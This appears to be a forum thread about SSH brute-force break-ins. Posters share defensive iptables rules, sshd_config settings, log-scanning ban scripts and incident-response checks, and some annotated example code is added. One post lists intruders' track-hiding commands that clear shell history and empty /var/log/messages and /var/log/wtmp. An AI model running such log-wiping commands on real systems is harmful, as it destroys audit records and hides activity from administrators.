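# Addresses with at least THRESHOLD failures. A threshold of 1 would block
# anyone who mistypes a password once, yourself included.
offenders() {
    attempts_per_ip | awk -v t="$1" '$1 >= t { print $2 }'
}

# One DROP rule per offender, printed for review. Pipe into sh only after
# checking that the list does not contain your own address.
drop_rules() {
    offenders "$1" | while read -r ip; do
        printf 'iptables -A INPUT -p tcp --dport 22 -s %s -j DROP\n' "$ip"
    done
}

# Stand-alone demo on the constructed log. Real use:
#   grep sshd /var/log/messages | drop_rules 5
printf '%s\n' "$SAMPLE_LOG" | drop_rules 3
```

Rules appended this way are not expired, so a compromised host that is later cleaned stays blocked until you flush the chain; the tools that do this properly (fail2ban, sshguard, portsentry as rdvrey describes further down) keep a timer per address.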

----------

## moocha

 *simulacrum wrote:*   

> The intruder grabbed vulturu.tar.gz and unpacked an application called "raven". There were several other applications downloaded but I didn't bother saving them. I guess in retrospect that might have been the way to go. I'd be curious if anyone here was familiar with this vulturu/raven application.

 

Bit of trivia: In Romanian, "vultur" means "eagle". Sounds like a nickname / handle for the creator of the corresponding rootkit. Not surprising, too - Romania does seem to exhibit an unusually high density of script kiddies per square kilometer.

----------

## Mythos

sorry but ... why use 22 port ? change port ...

Block as default your iptables and only allow what you want ...

install hardened-dev-sources with grsecurity and PaX plus SELinux, then your system is close to openbsd and heaven secure i guess.

something like this ...

```
# Placeholder definitions (not in the original post): the script below uses
# these variables without setting them.
IPTABLES=/sbin/iptables
EXTIP=203.0.113.1      # the remote address allowed to reach sshd
LOCALIP=192.0.2.2      # this host's own address

#Accept NEW,ESTABLISHED,RELATED
ACCEPTNER='-m state --state NEW,ESTABLISHED,RELATED -j ACCEPT'
ACCEPTER='-m state --state ESTABLISHED,RELATED -j ACCEPT'
ACCEPTN='-m state --state NEW -j ACCEPT'
AC='-m state --state NEW,ESTABLISHED,RELATED'

# Only chosen ports will be accepted.
$IPTABLES -P INPUT DROP
$IPTABLES -P OUTPUT DROP    # the OUTPUT chain needs its own ACCEPT rules, not shown in this excerpt
$IPTABLES -P FORWARD DROP

$IPTABLES -A INPUT -p tcp $ACCEPTER
$IPTABLES -A INPUT -p tcp -s $EXTIP -d $LOCALIP --dport 1022 $ACCEPTN #SSHD

#Block all
$IPTABLES -A INPUT -p tcp -j DROP
```

i have this in my sshd_config

```
#/etc/ssh/sshd_config
Port 1022
Protocol 2
AllowUsers dune
LoginGraceTime 1m
PermitRootLogin no
StrictModes yes
MaxAuthTries 2
PasswordAuthentication no
PermitEmptyPasswords no
# With UsePAM yes, PAM can still prompt for a password through the
# keyboard-interactive method unless ChallengeResponseAuthentication is
# also set to no; PasswordAuthentication no alone does not make the
# server key-only.
UsePAM yes
Subsystem       sftp    /usr/lib/misc/sftp-server
```
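A check for the point behind Enigma_Man's "(publickey,keyboard-interactive)" question and a caveat for the sshd_config above, added here as an example and not code from the thread or from any poster. It assumes the OpenSSH behaviour of the period: PasswordAuthentication governs only the plain "password" method, and with UsePAM yes the keyboard-interactive method still hands the prompt to PAM unless ChallengeResponseAuthentication is also no (newer releases call the same knob KbdInteractiveAuthentication). The two config texts are constructed; `password_login_disabled` reads a config on stdin and returns 0 only when no prompt can accept a password.

```sh
#!/bin/sh
# Added example, not code from the thread: decide whether an sshd_config
# really leaves only public-key logins. Match blocks are ignored.
set -u

# Print the effective value of directive KEY, or DEFAULT when it is unset.
# sshd uses the first uncommented occurrence of a keyword, so the first
# match wins; keywords are case-insensitive. Config text arrives on stdin.
directive() {
    awk -v key="$1" -v def="$2" '
        $1 !~ /^#/ && tolower($1) == tolower(key) { print $2; found = 1; exit }
        END { if (!found) print def }'
}

# Return 0 when no password can be typed at any prompt, 1 otherwise, and
# say which setting still opens the door. Upstream defaults are used for
# unset directives (PasswordAuthentication yes, ChallengeResponse yes,
# UsePAM no); distributions such as Gentoo ship UsePAM yes.
password_login_disabled() {
    cfg=$(cat)
    pw=$(printf '%s\n' "$cfg" | directive PasswordAuthentication yes)
    cr=$(printf '%s\n' "$cfg" | directive ChallengeResponseAuthentication yes)
    pam=$(printf '%s\n' "$cfg" | directive UsePAM no)
    if [ "$pw" != no ]; then
        echo "PasswordAuthentication $pw: plain password logins are allowed"
        return 1
    fi
    if [ "$pam" = yes ] && [ "$cr" != no ]; then
        echo "UsePAM yes with ChallengeResponseAuthentication $cr: PAM still asks for a password via keyboard-interactive"
        return 1
    fi
    echo "password logins disabled; only publickey remains"
    return 0
}

# Constructed: the shape of the config posted above, which still offers
# (publickey,keyboard-interactive) to a failed login.
WEAK_CFG='Port 1022
PermitRootLogin no
PasswordAuthentication no
UsePAM yes'

# Constructed: the same file with the missing directive added.
FIXED_CFG='Port 1022
PermitRootLogin no
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM yes'

# Real use: password_login_disabled < /etc/ssh/sshd_config
printf '%s\n' "$WEAK_CFG" | password_login_disabled || true   # expected: not disabled
printf '%s\n' "$FIXED_CFG" | password_login_disabled
```

Keeping UsePAM yes with ChallengeResponseAuthentication no is the usual fix: PAM still runs its account and session modules (expiry, limits, logging) while no PAM module ever gets to ask for a password.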

----------

## alxcm

Hey all...

Do you think a firewall is really necessary?  I run a DMZ'd server with the following nmap -sS reply:

```
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-03-28 12:22 EST
Interesting ports on xxx (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
631/tcp  open  ipp
1024/tcp open  kdm
1025/tcp open  NFS-or-IIS
2049/tcp open  nfs
3632/tcp open  distccd
8080/tcp open  http-proxy

Nmap run completed -- 1 IP address (1 host up) scanned in 188.675 seconds
```

I get people bouncing off of ssh all the time but my passwords are very secure...nobody has yet logged in, as far as I can tell from the logs.  I know distcc might not be the best idea, but I'll probably set up iptables for that.  Anyway, any insecurities you can see right off the bat?

----------

## moocha

 *alxcm wrote:*   

> Anyway, any insecurities you can see right off the bat?

There's a difference between "insecure" and "exploitable". Assuming you're running the latest packages, there are no known exploitable vulnerabilities there. But there are two basic vulnerabilities:

1. It's possible to launch denial of service attacks against the services running on open ports, even if access control prevents unauthorized users using your services (for example, flooding the HTTP proxy with requests).

2. Nobody can guarantee the non-existence of any exploitable vulnerabilities on those services. Historically, for example, the portmapper (port 111) has been an entry portal for a lot of nasty things (anyone remember rpcstatd?  :Very Happy: ).

----------

## Mythos

 *moocha wrote:*   

>  *alxcm wrote:*   Anyway, any insecurities you can see right off the bat?
> 
> There's a difference between "insecure" and "exploitable". Assuming you're running the latest packages, there are no known exploitable vulnerabilities there. But there are two basic vulnerabilities:
> 
> 1. It's possible to launch denial of service attacks against the services running on open ports, even if access control prevents unauthorized users using your services (for example, flooding the HTTP proxy with requests).
> 
> 2. Nobody can guarantee the non-existence of any exploitable vulnerabilities on those services. Historically, for example, the portmapper (port 111) has been an entry portal for a lot of nasty things (anyone remember rpcstatd? ).

 

I think that hardened-dev-sources have an option that prevents that http request attack ...

```
[*] Deter exploit bruteforcing

CONFIG_GRKERNSEC_BRUTE:

If you say Y here, attempts to bruteforce exploits against forking
daemons such as apache or sshd will be deterred.  When a child of a
forking daemon is killed by PaX or crashes due to an illegal
instruction, the parent process will be delayed 30 seconds upon every
subsequent fork until the administrator is able to assess the
situation and restart the daemon.  It is recommended that you also
enable signal logging in the auditing section so that logs are
generated when a process performs an illegal instruction.

Symbol: GRKERNSEC_BRUTE [=y]
Prompt: Deter exploit bruteforcing
  Defined at grsecurity/Kconfig:248
  Depends on: GRKERNSEC
  Location:
```

----------

## moocha

No, Mythos, that's a completely different thing. CONFIG_GRKERNSEC_BRUTE does not protect you against a large number of requests, it just prevents forkbombing as a side effect of a large number of request, should those requests cause the daemon to die. Even then you're still potentially vulnerable to resource starvation attacks.

----------

## Mythos

well there is no perfect system ... the best solution is patching, updating and choosing carefully what services, users and ports are needed...

----------

## moocha

 *Mythos wrote:*   

> well there is no perfect system ... the best solution is patching, updating and choosing carefully what services, users and ports are needed...

 That's very good advice. In order to have a stable and secure system, less is always more  :Smile: .

----------

## someguy

indeed

----------

## Legoguy

Beware. The list of names they try is getting longer:

http://turbogfx.homelinux.org/sshattempts.txt

That was logged on the 25th, 6 days ago. 587 attempts within 10 minutes. Of course none of them were harmful (none of them existed) but I'd imagine the list is getting longer as the thing breaks into more boxes.

Starting from October 29th 2004, there have been 4166 attempts on my machine... none of them doing anything. You only really need to worry if you have a user/pass the same, although I can't confirm that, but it seems to be the case. 

To find all of the relevant items in your log:

```
grep "sshd\[[0-9]\+\]: \(Invalid\|User\|reverse\)" /var/log/messages
```

Add a " | wc -l " on it to see the number of attempts.

----------

## 59729

 *Legoguy wrote:*   

> Beware. The list of names they try is getting longer:
> 
> http://turbogfx.homelinux.org/sshattempts.txt
> 
> That was logged on the 25th, 6 days ago. 587 attempts within 10 minutes. Of course none of them were harmful (none of them existed) but I'd imagine the list is getting longer as the thing breaks into more boxes.
> ...

 

Actually

```
grep -c "sshd\[[0-9]\+\]: \(Invalid\|User\|reverse\)" /var/log/messages
```

does the trick, no need to pipe

----------

## Randseed

 *bcore wrote:*   

> Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.
> 
> I'd say the moral of the story here is don't create a test account, and if you do, don't also make it's password "test", and if you do that too, don't forget to delete it. 

 

If you can, set up OpenVPN as a server on your home machine, and then OpenVPN as a client on the work box. Then only allow incoming connections on the OpenVPN server. Then to even see ssh, they have to somehow crack OpenVPN first, THEN ssh in.

----------

## tdi

use knockd. 

they first have to know the order of knocks ...

or hardcore sci-fi version: 

use OpenVPN with ssh in it over the ppp in ICMP (ppp over icmp is possible)

----------

## moocha

Or, easier: Don't use passwords. Use public key authentication and passphrases.

----------

## rdvrey

Why not use sshd (or webmin) for remote control, but ...

make sshd use another port something weird and odd say 41567

and use portsentry to setup traps and 41560-41566 and 41568-41575

This way it is not a standard port and will only be found if a full port scan is done (costs a lot of time to scan).

But any scan from 0-65000 or the other way round, will fall in the portsentry trap before reaching anything serious

Portsentry then puts the IP address in the deny list of the firewall which totally blocks that IP for any form of connection.

Works for me for many years now.

Robert

PS don't make a typo when connecting yourself, you will get banned yourself (I have had that too)

----------

## moocha

Or, easier: Don't use passwords. Use public key authentication and passphrases.

 :Smile: 

----------

## rdvrey

 *moocha wrote:*   

> Or, easier: **Don't use passwords. Use public key authentication and passphrases.**
> 
> :)

But then you will need to have your key anywhere you go, I don't

----------

## pinger

3650 attempts since last May. All of them unsuccessful as far as I can tell. I have a nice collection of emails from ISPs saying they sent official warning letters or even kicked their users. Methinks a couple of script kiddies out there had some explaining to do to Daddy  :Laughing: 

----------

## mallchin

grep: /var/log/messages: No such file or directory   :Rolling Eyes: 

----------

## amne

Split off Unknown MAC in WLAN

----------

## nshade

I am not sure if you ever figured out what was done on your system, but I can tell you after seeing a lot of this from working for a server farm that offers servers for whatever you want, like hosting and stuff.

I see it every day. What happened to you was a brute force SSH scan where they found an account with an insecure password, as you have stated: the user account test with the password test. This happens daily where I work because people are, umm, how shall I say this.. dumb in creating an account with the same password. 

Well, those files you found are for launching an attack on another server or computer.. AKA packet kiddies do this to take someone offline or take a site offline; when multiple servers/workstations are compromised this way they use them to launch a DDoS attack.. 

It kinda sucks, yes, but that is why you should always stress security and securing your server/workstation, and make dang sure that your passwords are secure as well; no username and password should be the same. 

Well anyway, they are basically botnets that sit on an IRC server somewhere in a certain channel waiting for the commands to launch an attack on some poor soul. Imagine having over 300 workstations/servers on various backbones hitting your website/workstation/server; it will and can take it offline, at least till your ISP/firewall/hosting provider implements some type of protection against this. 

Even though they may have gotten in as a simple user does not mean they have not tried to gain root access either. I would recommend looking at your netstats, try `netstat -nlp` and double checking the ports. I would also recommend doing a `ps -aux | grep (username)` and then checking the processes running by them; you can always do `ls /proc/pid#### -al` and it should tell you where the files are located. 

And for those running apache or a web server of any sort, check /tmp, /var/tmp, /dev/shm; you may also want to check, in case you are running samba, /var/spool/samba and also /usr/local/apache/proxy or /usr/local/apache/vbox. 

Seen too many exploit scripts and the starts of root kits to be installed, or programs to obtain root by some means. 

I hope this gave you an idea where to look as well, in case they may have installed programs elsewhere besides their home directory. 

I would also check your log files again; most likely the IPs are spoofed, or through an open proxy, or if they are stupid enough to use their own IP.. well, you can always e-mail the ARIN contact or the ISP's upstream provider the logs. 

I know I may be a noob, but after working with redhat, freebsd, and yes even windows for a while, I see a lot of exploit scripts, attack scripts and root level compromises where I work.

Hope this helps you and other people. 

NS
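A defender-side complement to the `netstat -nlp` and `/proc/<pid>` checks recommended above, added here as an example and not code posted in the thread: it reads the kernel's socket table from /proc/net/tcp the way netstat does, decodes the hex addresses, and maps each socket back to the owning process through /proc/<pid>/fd, so the check does not depend on the netstat binary itself being intact. The /proc/net/tcp text below is constructed (TEST-NET addresses, a made-up unprivileged uid 1001 and invented inode numbers); the column layout and hex encoding are the real kernel format. A kernel-level rootkit can lie to /proc as well, so this is triage, not proof of a clean box.

```python
"""List TCP sockets straight from /proc/net/tcp and tie them to processes,
the information netstat -nlp shows, without relying on the netstat binary."""
import os
import socket
import struct
import sys
from dataclasses import dataclass

# Kernel TCP state codes as printed in the "st" column of /proc/net/tcp.
TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}

# Constructed sample of /proc/net/tcp as a little-endian host prints it.
# Row 2: a daemon listening on all interfaces as unprivileged uid 1001.
# Row 3: that same user's outbound connection to a remote IRC-style port.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 00000000:270F 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1001        0 23456 1 0000000000000000 100 0 0 10 0
   3: 0501A8C0:B5A2 077100CB:1A0B 01 00000000:00000000 00:00000000 00000000  1001        0 23457 1 0000000000000000 20 4 30 10 -1
"""


@dataclass
class TcpSocket:
    local: str
    lport: int
    remote: str
    rport: int
    state: str
    uid: int
    inode: int


def decode_endpoint(field, byteorder=sys.byteorder):
    """Turn '0100007F:0016' into ('127.0.0.1', 22). The kernel prints the
    IPv4 address as one 32-bit hex number in host byte order, so the byte
    order of the host that produced the table is needed to read it back."""
    hex_ip, hex_port = field.split(":")
    fmt = "<I" if byteorder == "little" else ">I"
    ip = socket.inet_ntoa(struct.pack(fmt, int(hex_ip, 16)))
    return ip, int(hex_port, 16)


def parse_proc_net_tcp(text, byteorder=sys.byteorder):
    """Parse the text of /proc/net/tcp into TcpSocket records (header skipped)."""
    sockets = []
    for line in text.splitlines()[1:]:
        f = line.split()
        if len(f) < 10:
            continue
        local, lport = decode_endpoint(f[1], byteorder)
        remote, rport = decode_endpoint(f[2], byteorder)
        sockets.append(TcpSocket(local, lport, remote, rport,
                                 TCP_STATES.get(f[3], f[3]), int(f[7]), int(f[9])))
    return sockets


def listening(sockets):
    return [s for s in sockets if s.state == "LISTEN"]


def owned_by(sockets, uid):
    """Sockets belonging to one account, e.g. the compromised 'test' user."""
    return [s for s in sockets if s.uid == uid]


def socket_owners(proc="/proc"):
    """Map socket inode -> (pid, exe path) by reading every /proc/<pid>/fd,
    which is how netstat -p finds the owning process. Needs root to see
    other users' processes; entries that cannot be read are skipped."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            continue
        for fd in fds:
            try:
                target = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
            if target.startswith("socket:["):
                try:
                    exe = os.readlink(os.path.join(proc, pid, "exe"))
                except OSError:
                    exe = "?"
                owners[int(target[8:-1])] = (int(pid), exe)
    return owners


def report(sockets, owners):
    """One line per socket in the style of netstat -nlp, process if known."""
    lines = []
    for s in sockets:
        pid, exe = owners.get(s.inode, ("-", "-"))
        lines.append(f"{s.state:<11} {s.local}:{s.lport} -> {s.remote}:{s.rport} "
                     f"uid={s.uid} pid={pid} exe={exe}")
    return lines


if __name__ == "__main__":
    with open("/proc/net/tcp") as fh:
        live = parse_proc_net_tcp(fh.read())
    for line in report(live, socket_owners()):
        print(line)
```

Run as root on the box being examined; an `exe` that points into a user's home directory, or into /tmp or /dev/shm as the post suggests checking, is the kind of entry worth a closer look. /proc/net/tcp6 has the same layout with 128-bit addresses and is not handled here.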

----------

## ThePsychotic2k

Unfortunately this is the way of the internet. More and more traffic is being generated every day with these types of attacks.

I feel so much safer in the last couple of months as my Uni has finally put a firewall up between external and internal connections (including blocking port 22). I haven't had any ssh connection attempts since; I only log other connection attempts on port 22 and the only time I ever got anything is when I'm sshing in and I forget to put -p xxxx.

But before the nice firewall i just used these simple ideas (and still do):

-- run sshd on a non default port

-- don't allow ssh root access

-- use iptables to block any connections to any port apart from what you use (only my ssh port for me)

----------

## electrofreak

 *bcore wrote:*   

> Yeah, I'm SSH'ed in from work most days.. Easiest way to check my email and transfer files between.
> 
> I'd say the moral of the story here is don't create a test account, and if you do, don't also make its password "test", and if you do that too, don't forget to delete it. 

 

Or at the very least turn off sftp and ftp and the like access and change the shell to /bin/false

----------

## AA

bcore: Since you only ssh into your machine from work you might want to set iptables to block all connections except those from your work ip address: assuming your work ip is static and not dynamic.

This should do it. Someone please correct me if I'm wrong, as I am hardly an expert when it comes to iptables!

```
iptables -A INPUT -p tcp -s xxx.xxx.xxx.xxx/GG -d yyy.yyy.yyy.yyy/SS --dport 22 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 -d yyy.yyy.yyy.yyy/SS --dport 22 -j DROP
```

where xxx.xxx.xxx.xxx is the work's gateway ip and yyy.yyy.yyy.yyy your home machine ip.

GG the work live ip subnet and SS your home machine subnet

----------

## jmckay123456789

I see people say "I see how many attempts there are on my machine, is there a way to stop it?".

I don't see why (or how) you need to stop attempts as long as your total security situation looks good. 

I'm very comfortable with my security, even though I get hundreds of attempts a day against me. My approach is pretty simple:

My firewall has the minimum number of ports open. So if you only want to ssh into the machine, you only need one port open. This means you only have to worry about one class of attacks, namely attacks on your ssh access.

So how do we secure our ssh? Well what are the vulnerabilities?

1) Flaws in the program/protocol. I feel good about these kinds of problems as long as I keep my ssh software up to date. There is a theoretical possibility that a black hat finds a vulnerability and exploits it before the maintainers of the ssh software ever find out. But if you have someone that good trying to hack your system, you have other problems.

2) Weak passwords, dictionary attacks, etc. My approach has been to:

a) Restrict the world of logins that work by editing my sshd config. I have disallowed root access, and in fact I disallow all access except by certain users. In my case that is just me plus my wife. So in addition to breaking my password they would have to guess one of our usernames. It is no inconvenience to me not to have root access because I can just su root as soon as I login.

b) Have strong passwords. Since there are only two usernames with access (thanks to above), I only have two passwords that I have to ensure are strong. 

So to summarize:

Firewall allows only ports you need

Keep your ssh software up to date

Restrict users who can login remotely to those that need that capability

Make sure those users have strong passwords

With those rules in mind, when I see that I have had hundreds of attempts it doesn't really bother me. 90% of them are attempts against  the root user, most of the rest are either against users like "www" or "mysql" or against names like "jim", "sarah", or other common names. I have yet to see a single attempt at either of my real usernames. And should they do that, they will still have to crack a strong  password. 

I feel like an elephant being attacked by gnats. It just doesn't bother me.

----------

## GNUtoo

Boh, I don't know if I should post it (it could give some ideas to some person) 

I'm a little bit lazy so I've not read all the posts (it's long to read) but I could help a bit

I suppose that you have talked about securing the computer

but you may have forgotten to secure the modem ...

some modems have default passwords...

so change the passwords

maybe the firmware could also be upgraded (in some cases there are some security holes)

----------

## ruurd

honesty makes me have to say that I didn't read all 12 pages, skipped the middle part, so this post might make no sense at all.  Please ignore if so.

I also noticed the SSH stuff, and I made a script to kick them out for a day after 15 attempts.  I know it's *no* protection mechanism, so please look 2 posts up and do what's said there, but following the 90% reasoning: the script just reduces the chance that they might succeed a little, and just reduces the mess in your /var/log/messages or /var/log/auth.

To run this script you will need a working iptables and 'at' (emerge at).

```
#!/bin/sh
# vim:ts=4:sw=4:tw=0
# Ruurd Koons 24th April 2005
# This script scans for failed login attempts and pushes the IP of
# frequent failing clients on the iptables list, which are removed
# using an at job afterwards.  The main purpose of this script is
# to stop ssh login attacks in an early stage of the process.
# Design note: it seems that a grep in front of awk activates input
# buffering, which delays the actual awk processing.  The piped
# greps below are only because of this reason done in awk itself.
# grep sshd | grep "Failed password" | grep -o -e "\([0-9]\{1,3\}\.\)\{3\}[0-9]\{1,3\}" |
# Requires gawk (for systime) and at(1); run as root, since iptables needs it.

SCANFILE="/var/log/messages"
LOGFILE="/var/log/banned_scanners"

# First argument: an alternative command producing log lines (e.g. "cat somelog");
# by default the live syslog is followed.
if [ "$1" != "" ]; then
   comm="$1"
else
   comm="tail --max-unchanged-stats=5 --follow=name $SCANFILE"
fi

# Second argument -d: debug mode, report instead of banning.  (POSIX sh compares with =, not ==.)
if [ "$2" = "-d" ]; then
   debug=1
else
   debug=0
fi

$comm | awk -v debug="$debug" -v logfile="$LOGFILE" '
   BEGIN   { threshold = 15; timeout = 30 * 60; }
   {
      # Syslog fields: $1-$3 timestamp, $4 host, $5 "sshd[pid]:".  The source
      # address is the fourth field from the end ("from A.B.C.D port N ssh2").
      if ($5 ~ /^sshd\[[0-9]+\]:$/ &&
          $0 ~ /Failed password/ &&
          $(NF - 3) ~ /[0-9]([0-9][0-9]?)?\.[0-9]([0-9][0-9]?)?\.[0-9]([0-9][0-9]?)?\.[0-9]([0-9][0-9]?)?$/)
      {
         $0 = $(NF - 3);
         # Strip the IPv4-mapped IPv6 prefix sshd logs on dual-stack hosts.
         if ($0 ~ /^::ffff:/) $0 = substr($0, 8);
         if (debug + 0 != 0) print $0, attempt["count"$0], attempt["time"$0];

         attempt["count"$0] += 1;
         # Start counting afresh if the previous failure is older than the timeout.
         if (systime() - attempt["time"$0] > timeout) {
            attempt["count"$0] = 1;
         }
         attempt["time"$0] = systime();
         # Never ban the all-zero address or anything containing 255 (crude broadcast guard).
         if (attempt["count"$0] > threshold &&
             $0 !~ /0+\.0+\.0+\.0+/ &&
             $0 !~ /255/)
         {
            if (debug + 0 == 0) {
               print systime() " " $0 >> logfile;
               system("iptables -A INPUT -j DROP --source " $0);
               # system() runs /bin/sh, so use POSIX redirection here (>& is csh/bash only).
               system("echo iptables -D INPUT -j DROP --source " $0 " | at now + 1 day > /dev/null 2>&1");
            } else {
               print systime() " " $0;
            }
            delete attempt["time"$0];
            delete attempt["count"$0];
         }
      }
   }
   END      { }
' &
```

The log that is written allows for later use such as permanent banning of returning IPs or distribution between several hosts in, for instance, a university network.

To recap what the script does:

- it adds the IP to the iptables INPUT chain when an IP fails to login using SSH

  * over 15 times

  * within 30 minutes

- the 'ban' lasts currently one day

- the ban is recorded in a small logfile, where the IP is prepended by the current UNIX epoch time

The main reason to ban only for a day is to keep the iptables chain small, as it will grow rapidly if you ban all, and most of them never come back after a day (from my experience).

I thought I'd share my script, maybe someone likes it also.

Cheers!
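The same ban decision in Python, added here as an example and not ruurd's script or any project's code, for readers who want to test the counting logic separately from the iptables side effect. It differs from the awk version in two deliberate ways: failures are kept in a true sliding window (a ban when more than 15 fall inside any 30 minutes, instead of a counter that resets on a gap), and there is a whitelist of networks that can never be banned, which addresses the question about locking out known-good hosts via spoofed failures that comes up later in the thread. The log lines, hostname, PIDs and addresses below are constructed; the line formats are the ones sshd emits.

```python
"""Sliding-window counter of failed sshd password attempts per source address,
with a whitelist, producing the iptables ban decision a log-watching script automates."""
import ipaddress
import re
import subprocess
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Matches both forms sshd logs: "Failed password for root from A.B.C.D port N ssh2"
# and "Failed password for invalid user bob from A.B.C.D port N ssh2".
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>\S+) port \d+"
)

# Constructed sample log: an unrelated line, two failures from an IPv4-mapped
# address, 17 rapid failures from one host, then 20 from a host we trust.
SAMPLE_LOG = (
    ["May 14 07:46:22 homebox sshd[9499]: Did not receive identification string from ::ffff:192.0.2.9",
     "May 14 07:47:01 homebox sshd[9502]: Failed password for invalid user jordan from ::ffff:192.0.2.9 port 51002 ssh2",
     "May 14 07:47:03 homebox sshd[9502]: Failed password for invalid user jordan from ::ffff:192.0.2.9 port 51002 ssh2"]
    + [f"May 14 07:5{i // 10}:{(i % 10) * 5:02d} homebox sshd[{9510 + i}]: Failed password for "
       f"invalid user test{i} from 198.51.100.23 port {40000 + i} ssh2" for i in range(17)]
    + [f"May 14 08:0{i // 10}:{(i % 10) * 5:02d} homebox sshd[{9600 + i}]: Failed password for "
       f"root from 10.0.0.5 port {42000 + i} ssh2" for i in range(20)]
)


def parse_failure(line, year):
    """Return (timestamp, ip_address) for a failed-password line, else None.
    Syslog omits the year, so the caller supplies it."""
    m = FAILED_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    raw = m["ip"]
    if raw.startswith("::ffff:"):       # IPv4 client seen through an IPv6 socket
        raw = raw[7:]
    return when, ipaddress.ip_address(raw)


class FailureTracker:
    def __init__(self, threshold=15, window_seconds=30 * 60, whitelist=()):
        self.threshold = threshold
        self.window = timedelta(seconds=window_seconds)
        self.whitelist = [ipaddress.ip_network(n) for n in whitelist]
        self.failures = defaultdict(deque)   # ip -> timestamps inside the window
        self.banned = {}                      # ip -> time of ban

    def exempt(self, ip):
        """Never ban the unspecified/loopback address or a whitelisted network:
        a spoofed failure from a trusted host must not lock that host out."""
        return ip.is_unspecified or ip.is_loopback or any(ip in n for n in self.whitelist)

    def record(self, when, ip):
        """Register one failure; return the ip if it has just crossed the threshold."""
        if self.exempt(ip) or ip in self.banned:
            return None
        q = self.failures[ip]
        q.append(when)
        while q and when - q[0] > self.window:  # drop failures older than the window
            q.popleft()
        if len(q) > self.threshold:
            self.banned[ip] = when
            del self.failures[ip]
            return ip
        return None


def ban_command(ip):
    """iptables invocation for a ban; -I puts it ahead of any ACCEPT rules."""
    return ["iptables", "-I", "INPUT", "-s", str(ip), "-j", "DROP"]


def scan(lines, year, tracker, execute=False):
    """Feed log lines through the tracker; return the addresses banned, in order.
    With execute=True the iptables command is actually run (needs root)."""
    banned = []
    for line in lines:
        parsed = parse_failure(line, year)
        if parsed is None:
            continue
        ip = tracker.record(*parsed)
        if ip is not None:
            banned.append(str(ip))
            if execute:
                subprocess.run(ban_command(ip), check=True)
    return banned


if __name__ == "__main__":
    print(scan(SAMPLE_LOG, 2005, FailureTracker(whitelist=["10.0.0.0/8"])))
```

Feeding it the live log (`tail -F` piped into a loop over `sys.stdin`) and scheduling the matching `-D` rule with `at`, as the awk script does, are the only pieces left out; they are side effects, and keeping them out of the tracker is what makes the threshold behaviour testable.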

----------

## bluedevils

In addition to using firewalls to limit access to work's IP only, you could also set either a cron for sshd on the box or a rule on the firewall to make it only available during work hours.  This should help to limit the time they have access to that port.  A cron on the box might be easier to manage if you need to do extra stuff outside of work hours.

----------

## Dreadfull

```

May 14 07:46:22 godshells sshd[9499]: Did not receive identification string from ::ffff:201.243.124.239

May 14 07:51:11 godshells sshd[9542]: Invalid user jordan from ::ffff:201.243.124.239

May 14 07:51:11 godshells sshd[9542]: reverse mapping checking getaddrinfo for 201-243-124-239.genericrev.cantv.net failed - POSSIBLE BREAKIN ATTEMPT!

```

how nice ..

i was sleeping at that hour and also noone knew my ip ..

----------

## sixtymhz

If anyone wants to know how these guys are hiding their tracks...

history -c

> .bash_history

cat /dev/null > /var/log/messages

cat /dev/null > /var/log/wtmp

Just to name a few.

Also wouldn't be a bad idea to 

chmod 700 /usr/bin/wget

chmod 700 /usr/bin/perl

----------

## freebies_11

 *sixtymhz wrote:*   

> chmod 700 /usr/bin/wget
> 
> chmod 700 /usr/bin/perl

 

This is an incredibly bad idea.

----------

## moocha

 *Heelios wrote:*   

>  *sixtymhz wrote:*   chmod 700 /usr/bin/wget
> 
> chmod 700 /usr/bin/perl 
> 
> This is an incredibly bad idea.

 Indeed.

That will break a lot of packages and will help exactly nothing - what's to prevent the attacker from simply uploading a statically linked wget? Nothing, that's what.

If you want to prevent certain accounts from doing networking, you can always use iptables' owner-match support, for example.

----------

## sixtymhz

eh, well I guess if you are paranoid, it wouldn't be too bad >_< 

Plus I was speaking in terms of already being hacked. My friend was hacked with the hacker using wget to exploit his forum and so forth. Setting wget and perl to 700 stopped him from doing anything else until he got his server up and running again (and updated!!)

But thanks for the insight.

Could you give a better example of the IPTABLES owner-match deal please?

----------

## moocha

 *sixtymhz wrote:*   

> eh, well I guess if you are paranoid, it wouldn't be too bad >_<

 Yes it would. Every application depending on perl (and those are legion) will break for a non-root user, thus forcing you to use root more, thus creating more security holes than it "fixes".

 *sixtymhz wrote:*   

> Plus I was speaking in terms of already being hacked.

 If a breakin already happened then it's ten times as pointless - if the enemy is already inside it's too late to fill the moat....

 *sixtymhz wrote:*   

> Could you give a better example of the IPTABLES owner-match deal please?

 See the iptables tutorial  :Smile: . IIRC, owner-match comes in the standard gentoo-sources too, not only in hardened, so it shouldn't be hard to figure out.

----------

## sixtymhz

Cool deal, thanks  :Wink: 

----------

## sixtymhz

Anyone have experience on setting up honey pots??

----------

## Karak

You know, like so many others, I saw this thread and after reading it thought "hrmm... maybe I should look at my sshd logs..." and holy god! Look at this!

```
